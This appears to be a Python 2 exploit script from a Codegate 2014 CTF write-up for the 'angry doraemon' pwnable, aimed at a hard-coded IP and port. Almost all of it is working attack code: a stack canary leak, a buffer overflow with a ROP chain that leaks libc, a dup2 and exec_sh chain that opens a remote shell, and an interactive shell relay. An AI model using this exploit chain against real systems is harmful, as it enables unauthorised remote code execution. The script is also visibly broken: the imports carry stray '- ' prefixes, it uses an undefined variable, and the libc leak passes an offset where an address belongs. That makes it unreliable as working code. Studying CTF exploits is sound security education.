#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Codegate 2014 write up by @_g05u_
# angry doraemon
# pwnable 250
# null-life.com
- import re
- import os
- import sys
- import math
- import time
- import struct
- import socket
# Target endpoint used by get_socket() below.
HOST = "58.229.183.18"
PORT = 8888
#Ubuntu 13.10 x86
# Every offset/address below is a hard-coded constant for the build named above;
# nothing in this script derives them at runtime.
offset_libc_main = 0x19810
offset_dup2 = 0xE11F0
got_libc_main = 0x0804B038  # not referenced anywhere in this script
got_write = 0x080486e0
rop_pop2_ret = 0x080495BE
exec_sh = 0x08048C62
# Initial value only; rebound at module level from get_canary() further down.
canary = "\x00\x8b\xc3\x84"
def get_socket():
    """Open a TCP connection to HOST:PORT and return the connected socket.

    Returns:
        A connected ``socket.socket`` (AF_INET, SOCK_STREAM). The caller
        owns it; this function never closes it and no timeout is set.
    """
    f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    f.connect((HOST, PORT))
    return f
def read_logo(s):
    """Consume the service banner and menu prompt from socket ``s``.

    Reads until a chunk containing ``'Waiting 2 seconds'`` arrives, sleeps
    2.2 s, then reads until a chunk containing ``'>'`` arrives.

    Args:
        s: a connected socket, as returned by ``get_socket()``.

    Returns:
        None. The received data is discarded.

    Note: each loop keeps only the most recent ``recv()`` chunk rather than
    accumulating, so a marker split across two chunks is never matched and
    the loop simply keeps reading (a zero-length recv on close also loops).
    """
    logo = ''
    menu = ''
    while 'Waiting 2 seconds' not in logo:
        logo = s.recv(1024 * 5)
    time.sleep(2.2) #wait 2.2 sec
    while '>' not in menu:
        menu = s.recv(1024)
def gadget_leer(addr, n):
    """Pack the 20-byte little-endian sequence used to read ``n`` bytes at ``addr``.

    ("leer" is Spanish for "read".) The layout is: ``got_write``, a fixed
    return address, the descriptor 4, ``addr``, ``n`` -- i.e. the argument
    order of write(fd, buf, count) with fd=4, per the author's comments.

    Args:
        addr: 32-bit address value to place in the buffer slot.
        n: 32-bit count value.

    Returns:
        A 20-byte ``str`` (Python 2) of five packed ``<I`` words.
    """
    data = struct.pack("<I", got_write)
    data += struct.pack("<I", 0x080492c5) #exit return
    data += struct.pack("<I", 0x4) # open fd (was: "fd abierto")
    data += struct.pack("<I", addr)
    data += struct.pack("<I", n)
    return data
def get_canary():
    """Open a fresh connection and return the 4-byte canary echoed by the service.

    Sends menu option ``'4'``, then ten ``'y'`` characters, and takes bytes
    22 onward of the 26-byte reply as the canary. The hex form is printed.
    The socket opened here is never closed.

    Returns:
        The raw ``str`` slice ``mi_opc[22:]`` (expected length 4; shorter if
        the 26-byte recv returned less).
    """
    print '[+] get canary '
    s = get_socket()
    read_logo(s)
    s.send('4')
    time.sleep(0.1)
    s.recv(1024) # read the prompt (was: "leer pregunta")
    time.sleep(0.1)
    s.send('y'*10)
    time.sleep(0.1)
    mi_opc = s.recv(26) # read the echo of my option (was: "leer mi opcion")
    _canary = mi_opc[22:]
    print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
    return _canary
def get_rop_shell(libc_base):
    """Pack the 52-byte chain: three ``dup2`` frames then ``exec_sh``.

    Each frame is ``libc_base + offset_dup2``, ``rop_pop2_ret``, the
    descriptor 4, and the target descriptor (0, 1, 2 in turn); the chain
    ends with the fixed ``exec_sh`` address. The computed dup2 address is
    printed.

    Args:
        libc_base: 32-bit base address added to ``offset_dup2``.

    Returns:
        A ``str`` (Python 2) of thirteen packed ``<I`` words.
    """
    print '[+] dup2 address: %s' % hex(libc_base + offset_dup2)
    data = struct.pack("<I", libc_base + offset_dup2)
    data += struct.pack("<I", rop_pop2_ret)
    data += struct.pack("<I", 4) # open fd (was: "fd abierto")
    data += struct.pack("<I", 0)
    data += struct.pack("<I", libc_base + offset_dup2)
    data += struct.pack("<I", rop_pop2_ret)
    data += struct.pack("<I", 4) # open fd
    data += struct.pack("<I", 1)
    data += struct.pack("<I", libc_base + offset_dup2)
    data += struct.pack("<I", rop_pop2_ret)
    data += struct.pack("<I", 4) # open fd
    data += struct.pack("<I", 2)
    data += struct.pack("<I", exec_sh)
    return data
# Script body: runs at import time (no __main__ guard). Three connections are
# opened in total -- one inside get_canary(), two here -- and none is closed.
canary = get_canary()
print 'Obteniendo libc base'
#get libc address base
s = get_socket()
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) # read the prompt (was: "leer pregunta")
time.sleep(0.1)
s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
# Reads exactly 4 bytes; a short recv here would make struct.unpack raise.
libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
print '[+] Addres libc base: %s' % hex(libc_base_address)
print 'Lanzando shell'
# launch shell (was: "lanzar shell")
rop_shell = get_rop_shell(libc_base_address)
s = get_socket()
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) # read the prompt
time.sleep(0.1)
s.send('y'*10 + canary + "A"*12 + rop_shell)
# Interactive relay: forward each stdin line, wait 0.5 s, print one recv chunk.
# Loops until interrupted; an empty readline at EOF still sends '' forever.
while True:
    sys.stdout.write("$ ")
    sys.stdout.flush()
    c = sys.stdin.readline()
    s.send(c)
    time.sleep(0.5)
    print s.recv(4095)